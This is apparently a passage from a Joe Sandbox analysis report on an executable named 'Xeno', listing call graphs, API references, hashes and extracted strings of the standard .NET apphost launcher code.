7ff68d5f2504 Concurrency::cancel_current_task free 8018->8019 8020 7ff68d5e1ac9 8019->8020 8020->7921 8022 7ff68d5f05d5 8021->8022 8032 7ff68d5f0330 8022->8032 8024 7ff68d5f05ef 8025 7ff68d5f05f4 setlocale 8024->8025 8026 7ff68d5f0601 8024->8026 8025->8026 8038 7ff68d5f01b0 8027->8038 8030 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 8031 7ff68d5f02a6 8030->8031 8033 7ff68d5f034d 8032->8033 8037 7ff68d5f0384 _Yarn 8032->8037 8034 7ff68d5f0352 free 8033->8034 8035 7ff68d5f0357 8033->8035 8034->8035 8036 7ff68d5f0370 malloc 8035->8036 8035->8037 8036->8037 8037->8024 8039 7ff68d5f2504 Concurrency::cancel_current_task free 8038->8039 8040 7ff68d5f01e4 8039->8040 8040->8030 8042 7ff68d5e15ab 8041->8042 8043 7ff68d5e183d 8042->8043 8047 7ff68d5e15c5 8042->8047 8044 7ff68d5e1460 3 API calls 8043->8044 8045 7ff68d5e1842 8044->8045 8053 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 8045->8053 8046 7ff68d5e15f1 8049 7ff68d5f0d08 std::_Facet_Register 4 API calls 8046->8049 8047->8046 8050 7ff68d5e15cb _Yarn 8047->8050 8051 7ff68d5e1647 8047->8051 8052 7ff68d5e1656 8047->8052 8048 7ff68d5e169f 8084 7ff68d5e5b50 8048->8084 8049->8050 8050->8048 8057 7ff68d5e17fe _invalid_parameter_noinfo_noreturn 8050->8057 8069 7ff68d5e6470 8050->8069 8051->8045 8051->8046 8055 7ff68d5f0d08 std::_Facet_Register 4 API calls 8052->8055 8056 7ff68d5e1848 8053->8056 8055->8050 8089 7ff68d5f2594 8056->8089 8060 7ff68d5e1805 8057->8060 8065 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 8060->8065 8061 7ff68d5e175d 8064 7ff68d5f2504 Concurrency::cancel_current_task free 8061->8064 8062 7ff68d5e1723 8062->8061 8066 7ff68d5e1756 _invalid_parameter_noinfo_noreturn 8062->8066 8063 7ff68d5e1872 8063->7971 8067 7ff68d5e17c2 8064->8067 8068 7ff68d5e182b 8065->8068 8066->8061 8067->8057 8067->8060 8068->7971 8070 7ff68d5e65f0 8069->8070 8074 7ff68d5e649e 8069->8074 8072 7ff68d5e1460 3 API calls 8070->8072 8071 7ff68d5e6508 8075 7ff68d5f0d08 std::_Facet_Register 4 API calls 8071->8075 8073 7ff68d5e65f5 8072->8073 8078 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 8073->8078 8074->8071 8076 7ff68d5e64fb 8074->8076 8077 7ff68d5e6537 8074->8077 8082 7ff68d5e64ee _Yarn 8074->8082 8075->8082 8076->8071 8076->8073 8080 7ff68d5f0d08 std::_Facet_Register 4 API calls 8077->8080 8081 7ff68d5e65fb 8078->8081 8079 7ff68d5e65a9 _invalid_parameter_noinfo_noreturn 8083 7ff68d5e659c _Yarn 8079->8083 8080->8082 8082->8079 8082->8083 8083->8048 8085 7ff68d5e5bb2 8084->8085 8088 7ff68d5e5b73 _Yarn 8084->8088 8086 7ff68d5e6470 5 API calls 8085->8086 8087 7ff68d5e5bc5 8086->8087 8087->8062 8088->8062 8090 7ff68d5f25a3 free 8089->8090 8091 7ff68d5f25ab 8089->8091 8090->8091 8091->8063 8093 7ff68d5f0d08 std::_Facet_Register 4 API calls 8092->8093 8094 7ff68d5f0656 8093->8094 8095 7ff68d5f0486 8094->8095 8101 7ff68d5f02a8 8094->8101 8097 7ff68d5f0674 8095->8097 8098 7ff68d5f0491 8097->8098 8099 7ff68d5f0686 8097->8099 8098->7934 8098->7935 8098->7937 8105 7ff68d5f0b9c 8099->8105 8102 7ff68d5f02ef 8101->8102 8102->8102 8103 7ff68d5f02f7 malloc 8102->8103 8104 7ff68d5f030c _Yarn 8103->8104 8104->8095 8106 7ff68d5f0bd1 8105->8106 8107 7ff68d5f0baa EncodePointer 8105->8107 8107->8098 8109 7ff68d5e6c90 8108->8109 8113 7ff68d5e6c6a 8108->8113 8111 7ff68d5e6c9e 8109->8111 8118 7ff68d5e6d10 8109->8118 8110 7ff68d5e6c8a 8110->7858 8111->7858 8113->8110 8114 7ff68d5e2180 18 API calls 8113->8114 8115 7ff68d5e6cf3 8114->8115 8116 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 8115->8116 8117 7ff68d5e6d04 8116->8117 8119 7ff68d5e6d34 8118->8119 8123 7ff68d5e6e09 8118->8123 8120 7ff68d5e6d10 18 API calls 8119->8120 8121 7ff68d5e6d58 8119->8121 8120->8121 8122 7ff68d5e6df8 8121->8122 8125 7ff68d5e6e34 8121->8125 8122->8123 8132 7ff68d5e6ee0 8122->8132 8123->8111 8126 7ff68d5e2180 18 API calls 8125->8126 8127 7ff68d5e6e76 8126->8127 8128 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 8127->8128 8129 7ff68d5e6e87 8128->8129 8130 7ff68d5e6eaa 8129->8130 8131 7ff68d5e6ee0 18 API calls 8129->8131 8130->8111 8131->8130 8133 7ff68d5e6f30 8132->8133 8134 7ff68d5e6ef7 8132->8134 8133->8123 8134->8133 8135 7ff68d5e2180 18 API calls 8134->8135 8136 7ff68d5e6f76 8135->8136 8137 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 8136->8137 8138 7ff68d5e6f87 8137->8138 8140 7ff68d5e2bea 8139->8140 8142 7ff68d5e2bb9 _Yarn 8139->8142 8141 7ff68d5e62b0 5 API calls 8140->8141 8141->8142 8143 7ff68d5e5500 5 API calls 8142->8143 8144 7ff68d5e2c1a 8143->8144 8145 7ff68d5e62b0 5 API calls 8144->8145 8149 7ff68d5e2c2e 8144->8149 8145->8149 8146 7ff68d5e2d33 8147 7ff68d5e2d4e 8146->8147 8148 7ff68d5e62b0 5 API calls 8146->8148 8147->7906 8147->7907 8148->8147 8149->8146 8150 7ff68d5e5ee0 _invalid_parameter_noinfo_noreturn malloc free RtlPcToFileHeader RaiseException 8149->8150 8150->8149 8151->7909 8153 7ff68d5f179e RtlLookupFunctionEntry 8152->8153 8154 7ff68d5f17b4 RtlVirtualUnwind 8153->8154 8155 7ff68d5f16db 8153->8155 8154->8153 8154->8155 8156 7ff68d5f167c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8155->8156 6533 7ff68d5f0fd0 6534 7ff68d5f0fe0 6533->6534 6546 7ff68d5f0dbc 6534->6546 6537 7ff68d5f1085 6538 7ff68d5f1004 _RTC_Initialize 6544 7ff68d5f1067 6538->6544 6554 7ff68d5f1ae0 InitializeSListHead 6538->6554 6540 7ff68d5f102e 6541 7ff68d5f1052 _configthreadlocale 6540->6541 6542 7ff68d5f105e 6541->6542 6543 7ff68d5f1062 _initialize_wide_environment 6542->6543 6542->6544 6543->6544 6545 7ff68d5f1075 6544->6545 6555 7ff68d5f181c IsProcessorFeaturePresent 6544->6555 6547 7ff68d5f0dcd 6546->6547 6551 7ff68d5f0dff 6546->6551 6548 7ff68d5f0e3c 6547->6548 6552 7ff68d5f0dd2 __scrt_acquire_startup_lock 6547->6552 6549 7ff68d5f181c 7 API calls 6548->6549 6550 7ff68d5f0e46 6549->6550 6551->6538 6552->6551 6553 7ff68d5f0def _initialize_onexit_table 6552->6553 6553->6551 6556 7ff68d5f1842 6555->6556 6557 7ff68d5f1861 RtlCaptureContext RtlLookupFunctionEntry 6556->6557 6558 7ff68d5f188a RtlVirtualUnwind 6557->6558 6559 7ff68d5f18c6 6557->6559 6558->6559 6560 7ff68d5f18f8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6559->6560 6561 7ff68d5f1946 6560->6561 6561->6537
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5EB670: GetModuleFileNameW.KERNEL32 ref: 00007FF68D5EB747
                                                                                        • Part of subcall function 00007FF68D5EB670: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EB870
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFB04
                                                                                        • Part of subcall function 00007FF68D5ECD20: GetFileAttributesExW.KERNEL32 ref: 00007FF68D5ECD99
                                                                                        • Part of subcall function 00007FF68D5EECD0: MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED48
                                                                                        • Part of subcall function 00007FF68D5EECD0: MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED8B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EF230
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EF9DE
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFA32
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFA89
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharFileMultiWide$AttributesModuleName
                                                                                      • String ID: %s$ - Installing .NET prerequisites might help resolve this problem.$App path: [%s]$Bundle Header Offset: [%lld]$Detected Single-File app bundle$Dotnet path: [%s]$Failed to resolve full path of the current executable [%s]$Host path: [%s]$Invoking fx resolver [%s] hostfxr_main_bundle_startupinfo$Invoking fx resolver [%s] hostfxr_main_startupinfo$Invoking fx resolver [%s] v1$Probed for and did not resolve library symbol %S$The application to execute does not exist: '%s'.$The library %s was found, but loading it from %s failed$The required library %s does not contain the expected entry point.$The required library %s does not support relative app dll paths.$The required library %s does not support single-file apps.$\$hostfxr.dll$hostfxr_main$hostfxr_main_bundle_startupinfo$hostfxr_main_startupinfo$hostfxr_set_error_writer$https://go.microsoft.com/fwlink/?linkid=798306
                                                                                      • API String ID: 2393550857-4017300566
                                                                                      • Opcode ID: 6a3e793679028705fd871e5bda2fcd184c772be0566a5ba38b22a21630c1b779
                                                                                      • Instruction ID: 087399e583d659b442bec98d8ff4639e1f4c22c4c4e9a828c98c25ad40700a53
                                                                                      • Opcode Fuzzy Hash: 6a3e793679028705fd871e5bda2fcd184c772be0566a5ba38b22a21630c1b779
                                                                                      • Instruction Fuzzy Hash: 79628462E18B82D5FB009B64E4403AD23A1FF44798F50523BDE5D87A99EFBCE589C311

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 417 7ff68d5e44e0-7ff68d5e451e 418 7ff68d5e4834-7ff68d5e4861 call 7ff68d5f0ce0 417->418 419 7ff68d5e4524-7ff68d5e455f call 7ff68d5eb670 417->419 424 7ff68d5e4565-7ff68d5e456c 419->424 425 7ff68d5e4751-7ff68d5e476d call 7ff68d5e2440 419->425 426 7ff68d5e456e-7ff68d5e4584 424->426 427 7ff68d5e4589-7ff68d5e45b4 424->427 432 7ff68d5e4772-7ff68d5e4783 GetModuleHandleW 425->432 429 7ff68d5e4702-7ff68d5e470a 426->429 430 7ff68d5e45c5-7ff68d5e45ce 427->430 431 7ff68d5e45b6-7ff68d5e45b9 427->431 433 7ff68d5e4745-7ff68d5e474d 429->433 434 7ff68d5e470c-7ff68d5e4722 429->434 435 7ff68d5e45d4-7ff68d5e45f6 430->435 437 7ff68d5e46be-7ff68d5e46d3 430->437 431->435 436 7ff68d5e45bb-7ff68d5e45c3 431->436 438 7ff68d5e4785-7ff68d5e479b call 7ff68d5e30e0 432->438 439 7ff68d5e479c-7ff68d5e47a4 432->439 433->425 444 7ff68d5e4724-7ff68d5e4737 434->444 445 7ff68d5e4740 call 7ff68d5f0d00 434->445 446 7ff68d5e45fc-7ff68d5e4600 435->446 447 7ff68d5e4868-7ff68d5e486d call 7ff68d5e1460 435->447 436->430 436->431 440 7ff68d5e4862-7ff68d5e4867 call 7ff68d5e5ec0 437->440 441 7ff68d5e46d9-7ff68d5e46f9 call 7ff68d5e6070 437->441 438->439 442 7ff68d5e47df-7ff68d5e47f9 439->442 443 7ff68d5e47a6-7ff68d5e47bc 439->443 440->447 463 7ff68d5e46fe 441->463 442->418 455 7ff68d5e47fb-7ff68d5e4811 442->455 451 7ff68d5e47be-7ff68d5e47d1 443->451 452 7ff68d5e47da call 7ff68d5f0d00 443->452 444->445 454 7ff68d5e4739-7ff68d5e473f _invalid_parameter_noinfo_noreturn 444->454 445->433 457 7ff68d5e4602-7ff68d5e4611 446->457 458 7ff68d5e4616-7ff68d5e4620 446->458 470 7ff68d5e486e-7ff68d5e488f call 7ff68d5e13c0 447->470 451->452 464 7ff68d5e47d3-7ff68d5e47d9 _invalid_parameter_noinfo_noreturn 451->464 452->442 454->445 467 7ff68d5e4813-7ff68d5e4826 455->467 468 7ff68d5e482f call 7ff68d5f0d00 455->468 457->429 460 7ff68d5e4622-7ff68d5e462c 458->460 461 7ff68d5e4668-7ff68d5e4688 458->461 469 7ff68d5e4630-7ff68d5e4637 460->469 461->470 471 7ff68d5e468e-7ff68d5e4691 461->471 463->429 464->452 467->468 472 7ff68d5e4828-7ff68d5e482e _invalid_parameter_noinfo_noreturn 467->472 468->418 474 7ff68d5e4639-7ff68d5e4640 469->474 475 7ff68d5e4698 call 7ff68d5f0d08 469->475 483 7ff68d5e4891-7ff68d5e4895 470->483 484 7ff68d5e489b 470->484 471->469 477 7ff68d5e4693-7ff68d5e4696 471->477 472->468 474->470 478 7ff68d5e4646-7ff68d5e4654 call 7ff68d5f0d08 474->478 480 7ff68d5e469d-7ff68d5e46bc call 7ff68d5f5200 475->480 477->480 478->454 490 7ff68d5e465a-7ff68d5e4666 478->490 480->463 483->484 487 7ff68d5e4897-7ff68d5e4899 483->487 488 7ff68d5e489d-7ff68d5e48a0 484->488 487->488 491 7ff68d5e48a2-7ff68d5e48a7 488->491 492 7ff68d5e48ad 488->492 490->480 491->492 493 7ff68d5e48a9-7ff68d5e48ab 491->493 494 7ff68d5e48af-7ff68d5e48bb 492->494 493->494 495 7ff68d5e48c1-7ff68d5e48c3 494->495 496 7ff68d5e4998 494->496 495->496 497 7ff68d5e48c9-7ff68d5e48dc 495->497 498 7ff68d5e499f-7ff68d5e49bb 496->498 499 7ff68d5e48e2-7ff68d5e48ec 497->499 500 7ff68d5e48de-7ff68d5e48e0 497->500 501 7ff68d5e48f8-7ff68d5e490f 499->501 502 7ff68d5e48ee-7ff68d5e48f2 499->502 500->501 501->496 504 7ff68d5e4915-7ff68d5e4918 501->504 502->501 503 7ff68d5e48f4 502->503 503->501 505 7ff68d5e492e-7ff68d5e493a 504->505 506 7ff68d5e491a-7ff68d5e491d 504->506 509 7ff68d5e493c-7ff68d5e493f 505->509 510 7ff68d5e4957-7ff68d5e495a 505->510 507 7ff68d5e4924-7ff68d5e4927 506->507 508 7ff68d5e491f-7ff68d5e4922 506->508 507->505 513 7ff68d5e4929-7ff68d5e492c 507->513 508->496 508->507 509->510 514 7ff68d5e4941-7ff68d5e4955 509->514 511 7ff68d5e498e-7ff68d5e4996 510->511 512 7ff68d5e495c-7ff68d5e495f 510->512 511->498 512->511 515 7ff68d5e4961-7ff68d5e498b 512->515 513->496 513->505 514->510 515->511
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5EB670: GetModuleFileNameW.KERNEL32 ref: 00007FF68D5EB747
                                                                                        • Part of subcall function 00007FF68D5EB670: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EB870
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E4739
                                                                                      • GetModuleHandleW.KERNEL32 ref: 00007FF68D5E4774
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E47D3
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E4828
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E486E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Module$Concurrency::cancel_current_taskFileHandleName
                                                                                      • String ID:
                                                                                      • API String ID: 1091411171-0
                                                                                      • Opcode ID: 941ecb483df5ffccfcd00972da0a06e3cde05fdc4887f70ae5dc1777fb017ae0
                                                                                      • Instruction ID: 5cd1117ccbd952e9685b39550cb6bb5ad64f034d08706818057a5f87433fab2c
                                                                                      • Opcode Fuzzy Hash: 941ecb483df5ffccfcd00972da0a06e3cde05fdc4887f70ae5dc1777fb017ae0
                                                                                      • Instruction Fuzzy Hash: DEE1AA62F18B82C5EB00DB68D0542BC23A1FF447A8F41463ADE6D97AD5EF38E589C311

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 226 7ff68d5e77d0-7ff68d5e7848 call 7ff68d5e6fd0 __stdio_common_vswprintf 229 7ff68d5e784a-7ff68d5e7857 226->229 230 7ff68d5e78c9 226->230 232 7ff68d5e7a54-7ff68d5e7a59 call 7ff68d5e7c10 229->232 233 7ff68d5e785d-7ff68d5e7864 229->233 231 7ff68d5e78ce-7ff68d5e791b __stdio_common_vsnwprintf_s OutputDebugStringW 230->231 235 7ff68d5e793f-7ff68d5e7956 231->235 236 7ff68d5e791d 231->236 237 7ff68d5e786a-7ff68d5e7871 233->237 238 7ff68d5e7866-7ff68d5e7868 233->238 239 7ff68d5e798f-7ff68d5e7994 235->239 240 7ff68d5e7958-7ff68d5e798d __acrt_iob_func fputws __acrt_iob_func fputwc 235->240 242 7ff68d5e7920-7ff68d5e7929 236->242 244 7ff68d5e7873-7ff68d5e787a 237->244 245 7ff68d5e789c-7ff68d5e78a4 call 7ff68d5f0d08 237->245 243 7ff68d5e78a7-7ff68d5e78c7 call 7ff68d5f58a0 238->243 246 7ff68d5e799d-7ff68d5e79a4 239->246 240->246 249 7ff68d5e7930-7ff68d5e793d 242->249 250 7ff68d5e792b SwitchToThread 242->250 243->231 251 7ff68d5e7a4e-7ff68d5e7a53 call 7ff68d5e13c0 244->251 252 7ff68d5e7880-7ff68d5e7888 call 7ff68d5f0d08 244->252 245->243 254 7ff68d5e79f3-7ff68d5e79fd 246->254 255 7ff68d5e79a6-7ff68d5e79bb __acrt_iob_func 246->255 249->235 249->242 250->249 251->232 265 7ff68d5e7a2e-7ff68d5e7a34 _invalid_parameter_noinfo_noreturn 252->265 266 7ff68d5e788e-7ff68d5e789a 252->266 263 7ff68d5e79ff-7ff68d5e7a17 254->263 264 7ff68d5e7a3d-7ff68d5e7a4d 254->264 261 7ff68d5e79c3-7ff68d5e79f2 __stdio_common_vfwprintf fputwc 255->261 262 7ff68d5e79bd-7ff68d5e79c1 255->262 261->254 262->254 262->261 267 7ff68d5e7a35-7ff68d5e7a38 call 7ff68d5f0d00 263->267 268 7ff68d5e7a19-7ff68d5e7a2c 263->268 265->267 266->243 267->264 268->265 268->267
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: __acrt_iob_func$fputwc$Concurrency::cancel_current_taskDebugOutputStringSwitchThread__stdio_common_vfwprintf__stdio_common_vsnwprintf_s__stdio_common_vswprintf_invalid_parameter_noinfo_noreturnfputws
                                                                                      • String ID:
                                                                                      • API String ID: 2955450764-0
                                                                                      • Opcode ID: 17e2c6f9a8c859e8e4abeb7482b12a8424880920e89ab4c27e5f1dc77cac5349
                                                                                      • Instruction ID: d18cdbdeda918256bb98736f6275ffaa58e2cc377bc89c21a363a27fa46e5849
                                                                                      • Opcode Fuzzy Hash: 17e2c6f9a8c859e8e4abeb7482b12a8424880920e89ab4c27e5f1dc77cac5349
                                                                                      • Instruction Fuzzy Hash: C4616F22A08B46D2EA109B56A80477973A5FF49FE0F14423ADEAD877D4EF7CE449C311

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5E6FE0: GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E7039
                                                                                        • Part of subcall function 00007FF68D5E6FE0: GetLastError.KERNEL32 ref: 00007FF68D5E7045
                                                                                        • Part of subcall function 00007FF68D5E6FE0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7257
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFC01
                                                                                      • SwitchToThread.KERNEL32 ref: 00007FF68D5EFCAE
                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCC9
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCDC
                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCE5
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCF0
                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCF9
                                                                                        • Part of subcall function 00007FF68D5E7720: SwitchToThread.KERNEL32 ref: 00007FF68D5E776C
                                                                                        • Part of subcall function 00007FF68D5E7720: __stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77A4
                                                                                        • Part of subcall function 00007FF68D5E7720: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: fflush$SwitchThread__acrt_iob_func_invalid_parameter_noinfo_noreturn$EnvironmentErrorLastVariable__stdio_common_vfwprintffputwc
                                                                                      • String ID: --- Invoked %s [version: %s] main = {$8.0.8 @Commit: 08338fcaa5c9b9a8190abb99222fed12aaba956c$Redirecting errors to custom writer.$apphost
                                                                                      • API String ID: 1906621915-1327384728
                                                                                      • Opcode ID: 611ecf2379d5d648aa8f3ef7cce2668ccd5e97ef67745fbdd9be6b367f1a3ddc
                                                                                      • Instruction ID: e0b4748283b2e3e328ae0365ef25b3ec91d60c01192960a8345a27598918b6d9
                                                                                      • Opcode Fuzzy Hash: 611ecf2379d5d648aa8f3ef7cce2668ccd5e97ef67745fbdd9be6b367f1a3ddc
                                                                                      • Instruction Fuzzy Hash: 6451DF21E08A43C1FA10AB24E8502B92361FF887D4F50413FED5DDA6A5EE7CE58DC722

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 305 7ff68d5e2440-7ff68d5e24cb RegisterEventSourceW call 7ff68d5e62b0 308 7ff68d5e2504-7ff68d5e251d call 7ff68d5e62b0 305->308 309 7ff68d5e24cd-7ff68d5e2502 call 7ff68d5f5200 305->309 313 7ff68d5e2522-7ff68d5e2549 call 7ff68d5e5500 308->313 309->313 316 7ff68d5e254b-7ff68d5e2557 313->316 317 7ff68d5e2567-7ff68d5e2579 call 7ff68d5e62b0 313->317 318 7ff68d5e255c-7ff68d5e2565 316->318 319 7ff68d5e2559 316->319 321 7ff68d5e257e-7ff68d5e2590 317->321 318->321 319->318 322 7ff68d5e2592-7ff68d5e25c7 call 7ff68d5f5200 321->322 323 7ff68d5e25c9-7ff68d5e25e2 call 7ff68d5e62b0 321->323 326 7ff68d5e25e7-7ff68d5e2603 call 7ff68d5e5500 322->326 323->326 330 7ff68d5e2605-7ff68d5e2611 326->330 331 7ff68d5e2621-7ff68d5e2633 call 7ff68d5e62b0 326->331 332 7ff68d5e2613 330->332 333 7ff68d5e2616-7ff68d5e261f 330->333 335 7ff68d5e2638-7ff68d5e264a 331->335 332->333 333->335 336 7ff68d5e2683-7ff68d5e26a1 call 7ff68d5e62b0 335->336 337 7ff68d5e264c-7ff68d5e2681 call 7ff68d5f5200 335->337 342 7ff68d5e26a4-7ff68d5e26d3 336->342 337->342 343 7ff68d5e26d5-7ff68d5e26e4 342->343 344 7ff68d5e2709-7ff68d5e2719 call 7ff68d5e62b0 342->344 345 7ff68d5e26e6 343->345 346 7ff68d5e26e9-7ff68d5e2707 call 7ff68d5f5200 343->346 351 7ff68d5e271c-7ff68d5e272d 344->351 345->346 346->351 352 7ff68d5e272f-7ff68d5e273b 351->352 353 7ff68d5e274b-7ff68d5e275d call 7ff68d5e62b0 351->353 354 7ff68d5e2740-7ff68d5e2749 352->354 355 7ff68d5e273d 352->355 357 7ff68d5e2762-7ff68d5e27b9 ReportEventW DeregisterEventSource 353->357 354->357 355->354 358 7ff68d5e27f4-7ff68d5e281a call 7ff68d5f0ce0 357->358 359 7ff68d5e27bb-7ff68d5e27d1 357->359 360 7ff68d5e27d3-7ff68d5e27e6 359->360 361 7ff68d5e27ef call 7ff68d5f0d00 359->361 360->361 363 7ff68d5e27e8-7ff68d5e27ee _invalid_parameter_noinfo_noreturn 360->363 361->358 363->361
                                                                                      APIs
                                                                                      • RegisterEventSourceW.ADVAPI32 ref: 00007FF68D5E2477
                                                                                        • Part of subcall function 00007FF68D5E62B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5E102D), ref: 00007FF68D5E640F
                                                                                        • Part of subcall function 00007FF68D5E62B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E645D
                                                                                      • ReportEventW.ADVAPI32 ref: 00007FF68D5E27A1
                                                                                      • DeregisterEventSource.ADVAPI32 ref: 00007FF68D5E27AA
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E27E8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
